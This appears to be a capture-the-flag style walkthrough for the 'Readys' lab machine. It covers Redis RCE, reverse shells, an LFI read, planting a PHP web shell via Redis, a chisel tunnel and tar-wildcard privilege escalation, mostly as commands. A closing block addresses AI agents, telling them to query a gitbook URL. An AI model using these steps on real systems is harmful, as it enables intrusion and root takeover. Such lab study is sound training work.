# 6379 ``` redis-cli -h 192.168.159.166 ``` Then to authenticate: ``` AUTH Ready4Redis? ``` ![](/files/JxLmKlwug9KU2sN7QjQF) We are in. ## Failed The version is 5.0.14: ![](/files/cwkYTegLF7h6YTcbFijK) Using this: We can get a shell: ``` python3 redis-rce.py -r 192.168.159.166 -L 192.168.45.223 -a 'Ready4Redis?' -f exp.so ``` ![](/files/YTJ1LPF715AMcv2opoep) Then set up a listener: ``` rlwrap nc -nlvp 80 ``` ![](/files/dciMcl7NUcrmrLekwGBy) We get a shell Now we can look for the wp-config file and get the database password: ``` cat /var/www/html/wp-config.php ``` ![](/files/Zqt9d40bY4M0p01x9JfD) Checking netstat: ``` netstat -antup ``` ![](/files/8fBCKdZiQHh6xg3hUoQn) But could not execute anything so was a waste **Can not proceed as we get a shell as redis user** ## Success We can check the service files for redis using the LFI: ``` curl http://192.168.231.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/systemd/system/redis.service > redis.service ``` Now we can find the writeable directory: ![](/files/eNYiUmSRdDFpf39TlY51) Then write a shell.php: ``` redis-cli -h 192.168.231.166 ``` ``` AUTH Ready4Redis? config set dir /opt/redis-files config set dbfilename shell.php set test '' save ``` Now we have command execution: ![](/files/qu3CkJn8OrUosujXLZrT) We can get a shell now: ![](/files/zBtJfV7bsMfk1cISUr4d) Now we can look for the wp-config file and get the database password: ``` cat /var/www/html/wp-config.php ``` ![](/files/Zqt9d40bY4M0p01x9JfD) Port forwarding: Target: ``` $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 ``` Kali: ``` chisel server --reverse --socks5 -p 8001 ``` But we don't find anything in database after logging in. We find a cron job after running linpeas: ![](/files/HwKcZKh3JYaIFpL9GHzl) ![](/files/1S36RMkm2VQlqmR8RO3g) Now we have tar with `*` which we can use to gain sudo access: ``` cd /var/www/html echo "" > '--checkpoint=1' echo "" > '--checkpoint-action=exec=sh payload.sh' nano payload.sh chmod +x payload.sh ``` Now in payload.sh: ![](/files/5OorN9CxoQr6Cusk0VQj) Now we get a shell in the listener: ``` sudo rlwrap nc -nlvp 80 ``` ![](/files/JObGtJDeG1dO0OuX5rb9) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/walkthroughs/pg-practice/readys/6379.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.